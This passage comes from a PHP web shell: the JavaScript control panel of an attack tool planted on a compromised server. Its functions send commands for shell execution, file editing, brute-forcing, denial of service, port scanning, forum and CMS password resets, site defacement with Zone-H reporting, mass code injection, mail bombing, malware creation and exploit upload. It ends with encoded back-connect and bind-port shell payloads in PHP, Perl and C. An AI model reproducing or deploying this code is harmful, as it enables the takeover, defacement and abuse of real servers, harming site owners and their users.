6511 {
6512 setpath(myfilepath);
6513 document.getElementById("crdir").innerHTML=myurl;
6514 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6515 }
6516 }
6517
6518 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6519 ajaxRequest.send(null);
6520}
6521function gethome(myaction,mydir)
6522{
6523 var myurl = urlchange(mydir);
6524 document.getElementById("showmaindata").innerHTML=waitstate;
6525 var ajaxRequest;
6526 ajaxRequest = new XMLHttpRequest();
6527
6528 ajaxRequest.onreadystatechange = function()
6529 {
6530 if(ajaxRequest.readyState == 4)
6531 {
6532 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6533 setpath(mydir);
6534 document.getElementById("crdir").innerHTML=myurl;
6535 }
6536 }
6537
6538 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
6539 ajaxRequest.send(null);
6540}
6541function getname(sitename)
6542{
6543 document.getElementById("showsite").innerHTML=waitstate;
6544 var ajaxRequest;
6545 ajaxRequest = new XMLHttpRequest();
6546
6547 ajaxRequest.onreadystatechange = function()
6548 {
6549 if(ajaxRequest.readyState == 4)
6550 {
6551 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
6552 }
6553 }
6554
6555 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
6556 ajaxRequest.send(null);
6557}
6558function myaction(myfileaction,chmode)
6559{
6560 var mytype = document.getElementsByName('actbox[]');
6561 var mychoice = new Array();
6562
6563 for (var i = 0, length = mytype.length; i < length; i++)
6564 {
6565 if (mytype[i].checked)
6566 mychoice[i] = mytype[i].value;
6567 }
6568
6569 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
6570
6571 document.getElementById("showmydata").className = "fixedbox";
6572 document.getElementById("showmydata").innerHTML=waitstate;
6573 var ajaxRequest;
6574 ajaxRequest = new XMLHttpRequest();
6575
6576 ajaxRequest.onreadystatechange = function()
6577 {
6578 if(ajaxRequest.readyState == 4)
6579 {
6580 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6581 }
6582 }
6583
6584 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6585 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6586 ajaxRequest.send(params);
6587}
6588function editdata()
6589{
6590 var result = "", // initialize list
6591 i,dbname,tablename;
6592 // iterate through arguments
6593 for (i = 1; i < arguments.length; i++)
6594 {
6595 if(i%2 == 0)
6596 result += arguments[i]+'=';
6597 else
6598 result += arguments[i]+'&';
6599 }
6600 result = result.slice(0, -1);
6601
6602 dbname = arguments[3];
6603 tablename = arguments[5];
6604 var result=result.replace(/dhanush_/g,"");
6605 var params = arguments[0]+"="+result;
6606
6607 document.getElementById("showsql").innerHTML=waitstate;
6608 var ajaxRequest;
6609 ajaxRequest = new XMLHttpRequest();
6610
6611 ajaxRequest.onreadystatechange = function()
6612 {
6613 if(ajaxRequest.readyState == 4)
6614 {
6615 viewtables('listTables',dbname,tablename);
6616 }
6617 }
6618
6619 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6620 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6621 ajaxRequest.send(params);
6622}
6623function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
6624{
6625 document.getElementById("showsql").innerHTML=waitstate;
6626 var ajaxRequest;
6627 ajaxRequest = new XMLHttpRequest();
6628
6629 ajaxRequest.onreadystatechange = function()
6630 {
6631 if(ajaxRequest.readyState == 4)
6632 {
6633 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6634 }
6635 }
6636
6637 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
6638 ajaxRequest.send(null);
6639}
6640function mydatabase(server,username,password)
6641{
6642 document.getElementById("showsql").innerHTML=waitstate;
6643 var ajaxRequest;
6644 ajaxRequest = new XMLHttpRequest();
6645
6646 ajaxRequest.onreadystatechange = function()
6647 {
6648 if(ajaxRequest.readyState == 4)
6649 {
6650 mydatago();
6651 }
6652 }
6653
6654 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
6655 ajaxRequest.send(null);
6656}
6657function mydatago()
6658{
6659 var ajaxRequest;
6660 ajaxRequest = new XMLHttpRequest();
6661
6662 ajaxRequest.onreadystatechange = function()
6663 {
6664 if(ajaxRequest.readyState == 4)
6665 {
6666 document.getElementById("datatable").style.display = 'none';
6667 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6668 }
6669 }
6670
6671 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
6672 ajaxRequest.send(null);
6673}
6674function bruteforce(prototype,serverport,login,dict)
6675{
6676 var mytype = document.getElementsByName('mytype');
6677 for (var i = 0, length = mytype.length; i < length; i++)
6678 {
6679 if (mytype[i].checked)
6680 break;
6681 }
6682 var getreverse = 0;
6683 if(document.getElementById('reverse').checked == true)
6684 getreverse = 1;
6685 else
6686 getreverse = 0;
6687
6688 document.getElementById("showbrute").innerHTML=waitstate;
6689 var ajaxRequest;
6690 ajaxRequest = new XMLHttpRequest();
6691
6692 ajaxRequest.onreadystatechange = function()
6693 {
6694 if(ajaxRequest.readyState == 4)
6695 {
6696 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
6697 }
6698 }
6699
6700 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
6701 ajaxRequest.send(null);
6702}
6703function executemyfile(action,executepath,execute)
6704{
6705 document.getElementById("showmydata").className = "fixedbox";
6706 document.getElementById("showmydata").innerHTML=waitstate;
6707 var ajaxRequest;
6708 ajaxRequest = new XMLHttpRequest();
6709
6710 ajaxRequest.onreadystatechange = function()
6711 {
6712 if(ajaxRequest.readyState == 4)
6713 {
6714 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6715 }
6716 }
6717
6718 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
6719 ajaxRequest.send(null);
6720}
6721function maindata(myaction,dir)
6722{
6723 document.getElementById("showmaindata").innerHTML=waitstate;
6724 var ajaxRequest;
6725 ajaxRequest = new XMLHttpRequest();
6726
6727 ajaxRequest.onreadystatechange = function()
6728 {
6729 if(ajaxRequest.readyState == 4)
6730 {
6731 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6732 document.getElementById("showdir").innerHTML="";
6733 }
6734 }
6735
6736 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
6737 ajaxRequest.send(null);
6738}
6739function manuallyscriptfn(sctype,passwd)
6740{
6741 var message = encodeURIComponent(passwd);
6742 var params = sctype+"="+sctype+"&passwd="+passwd;
6743 document.getElementById("showdata").innerHTML=waitstate;
6744 var ajaxRequest;
6745 ajaxRequest = new XMLHttpRequest();
6746
6747 ajaxRequest.onreadystatechange = function()
6748 {
6749 if(ajaxRequest.readyState == 3)
6750 {
6751 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6752 }
6753 }
6754
6755 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6756 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6757 ajaxRequest.send(params);
6758}
6759function my404page(message)
6760{
6761 var message = encodeURIComponent(message);
6762 var params = "404page=404page&message="+message;
6763 document.getElementById("showdata").innerHTML=waitstate;
6764 var ajaxRequest;
6765 ajaxRequest = new XMLHttpRequest();
6766
6767 ajaxRequest.onreadystatechange = function()
6768 {
6769 if(ajaxRequest.readyState == 4)
6770 {
6771 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6772 }
6773 }
6774
6775 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6776 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6777 ajaxRequest.send(params);
6778}
6779function executemyfn(executepath,executemycmd)
6780{
6781 var ajaxRequest,app;
6782 ajaxRequest = new XMLHttpRequest();
6783
6784 ajaxRequest.onreadystatechange = function()
6785 {
6786 if(ajaxRequest.readyState == 4)
6787 {
6788 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "\n";
6789 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
6790 }
6791 }
6792
6793 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
6794 ajaxRequest.send(null);
6795}
6796function zoneh(defacer,hackmode,reason,domain)
6797{
6798 var domain = encodeURIComponent(domain);
6799 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
6800 document.getElementById("showzone").innerHTML=waitstate;
6801 var ajaxRequest;
6802 ajaxRequest = new XMLHttpRequest();
6803
6804 ajaxRequest.onreadystatechange = function()
6805 {
6806 if(ajaxRequest.readyState == 4)
6807 {
6808 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
6809 }
6810 }
6811
6812 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6813 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6814 ajaxRequest.send(params);
6815}
6816function savemyfile(file,content)
6817{
6818 var content = encodeURIComponent(content);
6819 var params = "content="+content+"&file="+file;
6820 document.getElementById("showmydata").innerHTML=waitstate;
6821 document.getElementById("showdir").innerHTML="";
6822 var ajaxRequest;
6823 ajaxRequest = new XMLHttpRequest();
6824
6825 ajaxRequest.onreadystatechange = function()
6826 {
6827 if(ajaxRequest.readyState == 4)
6828 {
6829 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6830 }
6831 }
6832
6833 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6834 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6835 ajaxRequest.send(params);
6836}
6837function renamefun(file,to)
6838{
6839 document.getElementById("showmydata").innerHTML=waitstate;
6840 var ajaxRequest;
6841 ajaxRequest = new XMLHttpRequest();
6842
6843 ajaxRequest.onreadystatechange = function()
6844 {
6845 if(ajaxRequest.readyState == 4)
6846 {
6847 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6848 }
6849 }
6850
6851 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
6852 ajaxRequest.send(null);
6853}
6854function changeperms(chmode,myfilename)
6855{
6856 document.getElementById("showmydata").innerHTML=waitstate;
6857 var ajaxRequest;
6858 ajaxRequest = new XMLHttpRequest();
6859
6860 ajaxRequest.onreadystatechange = function()
6861 {
6862 if(ajaxRequest.readyState == 4)
6863 {
6864 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6865 }
6866 }
6867
6868 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
6869 ajaxRequest.send(null);
6870}
6871function defacefun(deface)
6872{
6873 var ajaxRequest;
6874 ajaxRequest = new XMLHttpRequest();
6875
6876 ajaxRequest.onreadystatechange = function()
6877 {
6878 if(ajaxRequest.readyState == 4)
6879 {
6880 alert(ajaxRequest.responseText);
6881 }
6882 }
6883
6884 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
6885 ajaxRequest.send(null);
6886}
6887function cancel()
6888{
6889 document.getElementById("showmydata").className = "";
6890 document.getElementById("showmydata").innerHTML='';
6891}
6892function fileaction(myaction,myfilepath)
6893{
6894 document.getElementById("showmydata").className = "fixedbox";
6895 document.getElementById("showmydata").innerHTML=waitstate;
6896 var ajaxRequest;
6897 ajaxRequest = new XMLHttpRequest();
6898
6899 ajaxRequest.onreadystatechange = function()
6900 {
6901 if(ajaxRequest.readyState == 4)
6902 {
6903 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6904 }
6905 }
6906
6907 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6908 ajaxRequest.send(null);
6909}
6910function bypassfun(funct,functvalue,optiontype)
6911{
6912 document.getElementById("showmydata").className = "fixedbox";
6913 document.getElementById("showmydata").innerHTML=waitstate;
6914 var ajaxRequest;
6915 ajaxRequest = new XMLHttpRequest();
6916 ajaxRequest.onreadystatechange = function()
6917 {
6918 if(ajaxRequest.readyState == 4)
6919 {
6920 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6921 }
6922 }
6923
6924 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
6925 ajaxRequest.send(null);
6926}
6927function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
6928{
6929 document.getElementById("showdos").innerHTML=waitstate;
6930 var ajaxRequest;
6931 ajaxRequest = new XMLHttpRequest();
6932
6933 ajaxRequest.onreadystatechange = function()
6934 {
6935 if(ajaxRequest.readyState == 4)
6936 {
6937 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
6938 }
6939 }
6940
6941 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
6942 ajaxRequest.send(null);
6943}
6944function createfile(filecreator,filecontent)
6945{
6946 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
6947 var filecontent = encodeURIComponent(filecontent);
6948 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
6949 document.getElementById("showdir").innerHTML=waitstate;
6950 var ajaxRequest;
6951 ajaxRequest = new XMLHttpRequest();
6952
6953 ajaxRequest.onreadystatechange = function()
6954 {
6955 if(ajaxRequest.readyState == 4)
6956 {
6957 gethome('home',mm);
6958 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
6959 document.getElementById("showmydata").innerHTML="";
6960 }
6961 }
6962
6963 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6964 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6965 ajaxRequest.send(params);
6966}
6967function createdir(create,createfolder)
6968{
6969 document.getElementById("showmydata").className = "fixedbox";
6970 document.getElementById("showmydata").innerHTML=waitstate;
6971 var ajaxRequest;
6972 ajaxRequest = new XMLHttpRequest();
6973
6974 ajaxRequest.onreadystatechange = function()
6975 {
6976 if(ajaxRequest.readyState == 4)
6977 {
6978 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6979 }
6980 }
6981
6982 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
6983 ajaxRequest.send(null);
6984}
6985function codeinsert(code)
6986{
6987 var code = encodeURIComponent(code);
6988 var params = "getcode="+code;
6989 document.getElementById("showcode").innerHTML=waitstate;
6990 var ajaxRequest;
6991 ajaxRequest = new XMLHttpRequest();
6992
6993 ajaxRequest.onreadystatechange = function()
6994 {
6995 if(ajaxRequest.readyState == 4)
6996 {
6997 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
6998 }
6999 }
7000
7001 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7002 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7003 ajaxRequest.send(params);
7004}
7005function getmydefacedata(mydata)
7006{
7007 document.getElementById("showmydeface").innerHTML=waitstate;
7008 var ajaxRequest;
7009 ajaxRequest = new XMLHttpRequest();
7010
7011 ajaxRequest.onreadystatechange = function()
7012 {
7013 if(ajaxRequest.readyState == 4)
7014 {
7015 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
7016 }
7017 }
7018
7019 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7020 ajaxRequest.send(null);
7021}
7022function getmydata(mydata)
7023{
7024 document.getElementById("showmydata").className = "fixedbox";
7025 document.getElementById("showmydata").innerHTML=waitstate;
7026 var ajaxRequest;
7027 ajaxRequest = new XMLHttpRequest();
7028
7029 ajaxRequest.onreadystatechange = function()
7030 {
7031 if(ajaxRequest.readyState == 4)
7032 {
7033 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7034 }
7035 }
7036
7037 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7038 ajaxRequest.send(null);
7039}
7040function getdata(mydata,myfile)
7041{
7042 document.getElementById("showdata").innerHTML=waitstate;
7043 var ajaxRequest;
7044 ajaxRequest = new XMLHttpRequest();
7045
7046 ajaxRequest.onreadystatechange = function()
7047 {
7048 if(ajaxRequest.readyState == 3)
7049 {
7050 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7051 }
7052 }
7053
7054 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
7055 ajaxRequest.send(null);
7056}
7057function getport(host,protocol,start,end)
7058{
7059 document.getElementById("showports").innerHTML=waitstate;
7060 var ajaxRequest;
7061 ajaxRequest = new XMLHttpRequest();
7062
7063 ajaxRequest.onreadystatechange = function()
7064 {
7065 if(ajaxRequest.readyState == 4)
7066 {
7067 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
7068 }
7069 }
7070
7071 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
7072 ajaxRequest.send(null);
7073}
7074function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
7075{
7076 document.getElementById("showchangepass").innerHTML=waitstate;
7077 var ajaxRequest;
7078 ajaxRequest = new XMLHttpRequest();
7079
7080 ajaxRequest.onreadystatechange = function()
7081 {
7082 if(ajaxRequest.readyState == 4)
7083 {
7084 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
7085 }
7086 }
7087
7088 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
7089 ajaxRequest.send(null);
7090}
7091function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
7092{
7093 var index = encodeURIComponent(index);
7094 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
7095 document.getElementById("showdeface").innerHTML=waitstate;
7096 var ajaxRequest;
7097 ajaxRequest = new XMLHttpRequest();
7098
7099 ajaxRequest.onreadystatechange = function()
7100 {
7101 if(ajaxRequest.readyState == 4)
7102 {
7103 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
7104 }
7105 }
7106
7107 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7108 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7109 ajaxRequest.send(params);
7110}
7111function codeinjector(pathtomass,mode,filetype,injectthis)
7112{
7113 var injectthis = encodeURIComponent(injectthis);
7114 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
7115 document.getElementById("showinject").innerHTML=waitstate;
7116 var ajaxRequest;
7117 ajaxRequest = new XMLHttpRequest();
7118
7119 ajaxRequest.onreadystatechange = function()
7120 {
7121 if(ajaxRequest.readyState == 3)
7122 {
7123 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
7124 }
7125 }
7126
7127 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7128 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7129 ajaxRequest.send(params);
7130}
7131function sendmail(mailfunction,to,subject,message,from,times,padding)
7132{
7133 var message = encodeURIComponent(message);
7134 if(mailfunction == "massmailing")
7135 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
7136 else if(mailfunction == "dobombing")
7137 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
7138 document.getElementById("showmail").innerHTML=waitstate;
7139 var ajaxRequest;
7140 ajaxRequest = new XMLHttpRequest();
7141
7142 ajaxRequest.onreadystatechange = function()
7143 {
7144 if(ajaxRequest.readyState == 4)
7145 {
7146 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
7147 }
7148 }
7149
7150 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7151 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7152 ajaxRequest.send(params);
7153}
7154function execode(code)
7155{
7156 var intext = document.getElementById('intext').checked;
7157 var message = encodeURIComponent(message);
7158 var params = "code="+code+"&intext="+intext;
7159 document.getElementById("showresult").innerHTML=waitstate;
7160 var ajaxRequest;
7161 ajaxRequest = new XMLHttpRequest();
7162
7163 ajaxRequest.onreadystatechange = function()
7164 {
7165 if(ajaxRequest.readyState == 4)
7166 {
7167 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
7168 }
7169 }
7170
7171 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7172 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7173 ajaxRequest.send(params);
7174}
7175function malwarefun(malwork)
7176{
7177 var malpath = document.getElementById('createfile').value;
7178 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
7179 var ajaxRequest;
7180 ajaxRequest = new XMLHttpRequest();
7181
7182 ajaxRequest.onreadystatechange = function()
7183 {
7184 if(ajaxRequest.readyState == 4)
7185 {
7186 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
7187 }
7188 }
7189
7190 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
7191 ajaxRequest.send(null);
7192}
7193function getexploit(wurl,path,functiontype)
7194{
7195 document.getElementById("showexp").innerHTML=waitstate;
7196 var ajaxRequest;
7197 ajaxRequest = new XMLHttpRequest();
7198
7199 ajaxRequest.onreadystatechange = function()
7200 {
7201 if(ajaxRequest.readyState == 4)
7202 {
7203 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
7204 }
7205 }
7206
7207 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
7208 ajaxRequest.send(null);
7209}
7210function showMsg(msg)
7211{
7212 if(msg == 'smf')
7213 {
7214 document.getElementById('tableprefix').value="smf_";
7215 document.getElementById('fid').style.display='block';
7216 document.getElementById('wpress').style.display='none';
7217 document.getElementById('joomla').style.display='none';
7218 }
7219 if(msg == 'mybb')
7220 {
7221 document.getElementById('tableprefix').value="mybb_";
7222 document.getElementById('wpress').style.display='none';
7223 document.getElementById('joomla').style.display='none';
7224 document.getElementById('fid').style.display='block';
7225 }
7226 if(msg == 'ipb' || msg == 'vb')
7227 {
7228 document.getElementById('tableprefix').value="";
7229 document.getElementById('wpress').style.display='none';
7230 document.getElementById('joomla').style.display='none';
7231 document.getElementById('fid').style.display='block';
7232 }
7233 if(msg == 'wp')
7234 {
7235 document.getElementById('tableprefix').value="wp_";
7236 document.getElementById('wpress').style.display='block';
7237 document.getElementById('fid').style.display='none';
7238 document.getElementById('joomla').style.display='none';
7239 }
7240 if(msg == 'joomla')
7241 {
7242 document.getElementById('joomla').style.display='block';
7243 document.getElementById('tableprefix').value="jos_";
7244 document.getElementById('wpress').style.display='none';
7245 document.getElementById('fid').style.display='none';
7246 }
7247}
7248function checkforum(msg)
7249{
7250 if(msg == 'smf')
7251 {
7252 document.getElementById('tableprefix').value="smf_";
7253 document.getElementById('smfipb').style.display='block';
7254 document.getElementById('myjoomla').style.display='none';
7255
7256 }
7257 if(msg == 'phpbb')
7258 {
7259 document.getElementById('tableprefix').value="phpb_";
7260 document.getElementById('myjoomla').style.display='none';
7261 document.getElementById('smfipb').style.display='block';
7262
7263 }
7264 if(msg == 'mybb')
7265 {
7266 document.getElementById('tableprefix').value="mybb_";
7267 document.getElementById('myjoomla').style.display='none';
7268 document.getElementById('smfipb').style.display='none';
7269 }
7270 if(msg == 'vb')
7271 {
7272 document.getElementById('tableprefix').value="";
7273 document.getElementById('myjoomla').style.display='none';
7274 document.getElementById('smfipb').style.display='none';
7275 }
7276 if(msg == 'ipb')
7277 {
7278 document.getElementById('myjoomla').style.display='none';
7279 document.getElementById('smfipb').style.display='block';
7280 document.getElementById('tableprefix').value="";
7281 }
7282 if(msg == 'wp')
7283 {
7284 document.getElementById('tableprefix').value="wp_";
7285 document.getElementById('myjoomla').style.display='block';
7286 document.getElementById('smfipb').style.display='none';
7287 document.getElementById('siteurl').value="http://site/blog";
7288 }
7289 if(msg == 'joomla')
7290 {
7291 document.getElementById('myjoomla').style.display='block';
7292 document.getElementById('tableprefix').value="jos_";
7293 document.getElementById('smfipb').style.display='none';
7294 document.getElementById('siteurl').value="http://site/administrator/";
7295 }
7296}
7297</script>
7298<body>
7299<?php
7300
7301$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
7302
7303$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
7304
7305$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
7306
